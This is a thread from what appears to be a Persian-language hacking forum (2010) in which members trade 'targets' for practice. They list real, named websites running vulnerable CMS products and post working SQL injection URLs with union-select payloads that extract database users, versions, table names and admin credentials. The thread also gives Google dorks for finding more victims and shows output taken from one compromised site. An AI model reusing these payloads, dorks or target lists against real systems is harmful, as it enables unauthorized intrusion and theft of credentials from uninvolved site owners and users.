IT Security Team  
قدیمی 04-24-2010, 05:04 PM   #21
عضو جديد
 
rahnama آواتار ها
 
تاریخ عضویت: Oct 2009
نوشته ها: 34
Thanks: 49
Thanked 39 Times in 22 Posts
پیش فرض

dar edemeye target haye ghabli een chand ta target ro ham ke rooye Template Seller Pro 3.25 gozaresh shode dashteh bashdi:
کد:
http://singularwebworks.com/template/fullview.php?tempid=-9999+union+all+select+1,2,3,4,5,6,7--
https://www.shiny-templates.com/fullview.php?tempid=87
http://limberweb.com/template/fullview.php?tempid=62
http://www.videogears.com/fullview.php?tempid=15
...
Spaas
rahnama آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to rahnama For This Useful Post:
4t0m (04-26-2010), lerning_Hack (12-01-2010)
قدیمی 04-25-2010, 01:07 PM   #22
عضو جديد
 
rahnama آواتار ها
 
تاریخ عضویت: Oct 2009
نوشته ها: 34
Thanks: 49
Thanked 39 Times in 22 Posts
پیش فرض new new targets

salami dobareh. target haye zir rooye AskMe Pro 2.1 (que_id)
کد:
http://www.asklive.co.uk/forum_answer.php?que_id=7
http://www.expertsonly.com/forum_answer.php?que_id=109
http://who-invented.com/forum_answer.php?que_id=
http://behonest.com/forum_answer.php?que_id=
.....
کد:
-9999+union+all+select+1,2,3,4,group_concat(username,char(58),password)v3n0m,6,7,8,9,10+from+expert--
khosh bashdi.
rahnama آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to rahnama For This Useful Post:
lerning_Hack (12-01-2010)
قدیمی 04-27-2010, 10:09 AM   #23
مديريت بخش
 
am!rkh@n آواتار ها
 
تاریخ عضویت: Feb 2010
محل سکونت: home/
نوشته ها: 146
Thanks: 117
Thanked 197 Times in 92 Posts
پیش فرض

target نمونه مربوط به IWD Group SQL Injection

کد:
http://www.abfar-eazar.co.ir/index.php?page=headline&id=%
کد:
http://www.abfar-eazar.co.ir/index.php?page=headline&id=-999.9 UNION ALL SELECT 1,2,concat(user(),char(58,58,58),version()),4--
کد:
Current DB: abfar_news
User: abfar_abfar@localhost
SQL ver: 5.0.67
...
یاشاسین آذربایجان!!
__________________
~::/It's not how YOU play the game. It's how the GAME plays you\::~

ویرایش توسط am!rkh@n : 04-27-2010 در ساعت 10:12 AM
am!rkh@n آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to am!rkh@n For This Useful Post:
lerning_Hack (12-01-2010)
قدیمی 04-27-2010, 10:25 AM   #24
مديريت بخش
 
am!rkh@n آواتار ها
 
تاریخ عضویت: Feb 2010
محل سکونت: home/
نوشته ها: 146
Thanks: 117
Thanked 197 Times in 92 Posts
پیش فرض Uiga Personal Portal SQL Injection

target مربوط به Uiga Personal Portal index.php (view) SQL Injection

کد:
http://www.inabanga.com/index.php?view=ar_det&exhort=35
کد:
http://www.inabanga.com/blog/index.php?view=ar_det&exhort=1+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin--
__________________
~::/It's not how YOU play the game. It's how the GAME plays you\::~
am!rkh@n آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to am!rkh@n For This Useful Post:
lerning_Hack (12-01-2010), rahnama (04-27-2010), Sily (09-12-2011)
قدیمی 04-27-2010, 06:29 PM   #25
عضو جديد
 
rahnama آواتار ها
 
تاریخ عضویت: Oct 2009
نوشته ها: 34
Thanks: 49
Thanked 39 Times in 22 Posts
پیش فرض new target

salam doostan. tagete jadid rooye Ramaas Software CMS
کد:
http://sbclive.net/view.php?articleid=14574
http://www.dahab-shil.com/view_businessnews.php?articleid=7
http://www.dalmar.org/view_health.php?articleid=5901
کد:
Exploit Title: Ramaas Software CMS SQL Injection Vulnerability
Dork : intext:"Powered by Ramaas Software"

http://sbclive.net/view.php?articleid=-14574+union+select+all+1,2,3,4,5,6,7,8,9,10--
http://sbclive.net/view.php?articleid=-14574+union+select+all+1,2,3,user(),5,database(),7,8,9,10--
http://sbclive.net/view.php?articleid=-14574+union+select+all+1,2,3,group_concat(table_name),5,6,7,8,9,10+from+information_schema.tables--
Sepaas
rahnama آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to rahnama For This Useful Post:
firemaker (04-28-2010), lerning_Hack (12-01-2010)
قدیمی 04-28-2010, 04:32 PM   #26
مديريت بخش
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
پیش فرض Target for SqlInjection

با سلام
با کسب اجازه از برادران مرتاز واقع در هند و تبت و جامو و کشمیر و ایالات ...

و البته با کسب اجازه از دوست خوبمون rahnama که ماشاءلله همه سایتهای اینجکشن دار رو دارن درو می کنن و می رن جلو. بابا عیول داری اونم از نوع بد جورش.

کد:
Dork :  intext:"Powered by Ramaas Software"
کد:
Example: 
	http://www.sanaagpost.com/display_page.php?articleid=4394'
	http://www.dahab-shil.com/view_businessnews.php?articleid=12'
	http://www.readhornofafrica.org/pictures_directory/ramaasimageshow.php?directory=pics&currentPic=10'
	http://www.puntlandpost.com/pictures_directory/ramaasimageshow.php?directory=Islaanka&currentPic=1'
	و ...
با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to firemaker For This Useful Post:
H4mid@Tm3l (04-28-2010), lerning_Hack (12-01-2010), rahnama (04-28-2010)
قدیمی 04-29-2010, 08:40 AM   #27
مديريت بخش
 
am!rkh@n آواتار ها
 
تاریخ عضویت: Feb 2010
محل سکونت: home/
نوشته ها: 146
Thanks: 117
Thanked 197 Times in 92 Posts
پیش فرض GeneShop 5.1.1 SQL Injection

target مربوط به GeneShop 5.1.1 SQL Injection

کد:
http://www.pottertons.co.uk/pott/browse.php?folder=103'
http://www.hills-photography.co.uk/hillsp/browse.php?folder=47'
__________________
~::/It's not how YOU play the game. It's how the GAME plays you\::~
am!rkh@n آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to am!rkh@n For This Useful Post:
lerning_Hack (12-01-2010), sahil_kinara (10-09-2011)
قدیمی 04-29-2010, 02:47 PM   #28
عضو جديد
 
rahnama آواتار ها
 
تاریخ عضویت: Oct 2009
نوشته ها: 34
Thanks: 49
Thanked 39 Times in 22 Posts
پیش فرض sql injection

salam , target rooye Modelbook (casting_view.php):

کد:
http://2kmodels.com/casting_view.php?adnum=1
http://www.modelturf.com/casting_view.php?adnum=56
http://actormodelsearch.com/casting_view.php?adnum=6
http://realmodelplace.com/casting_view.php?adnum=1
...
کد:
Title: Modelbook (casting_view.php) SQL Injection Vulnerability 
Published: 2010-04-28 
Dork : allinurl:casting_view.php?adnum=
کد:
http://www.modelturf.com/casting_view.php?adnum=56+order+by+10--
http://www.modelturf.com/casting_view.php?adnum=-56+union+select+1,user(),database(),@@version,5,6,7,8,9,10--

sepass
rahnama آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to rahnama For This Useful Post:
lerning_Hack (12-01-2010)
قدیمی 04-29-2010, 02:52 PM   #29
عضو جديد
 
rahnama آواتار ها
 
تاریخ عضویت: Oct 2009
نوشته ها: 34
Thanks: 49
Thanked 39 Times in 22 Posts
پیش فرض new target

salam dostan, target rooyePHP Video Battle
کد:
Title: PHP Video Battle SQL Injection Vulnerability 
Published: 2010-04-28 
Google Dork : © 1998 - 2010 Video Battle Script
http://videobattle.rocky.nu/browse.html?cat=1+order+by+6--
http://videobattle.rocky.nu/browse.html?cat=-1+union+select+1,2,3,4,5,6--
http://videobattle.rocky.nu/browse.html?cat=-1+union+select+1,2,user(),4,5,6--
khosh bashid
rahnama آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to rahnama For This Useful Post:
lerning_Hack (12-01-2010)
قدیمی 05-01-2010, 12:24 PM   #30
مديريت بخش
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
پیش فرض New Targets

با سلام
اینم چند تا Target دیگه.

کد:
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
کد:
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
(اون که بد می خونه منم)
با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to firemaker For This Useful Post:
lerning_Hack (12-01-2010)
پاسخ

برچسب ها
injection, sql, target, تمرین

ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال



اکنون ساعت 09:17 PM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.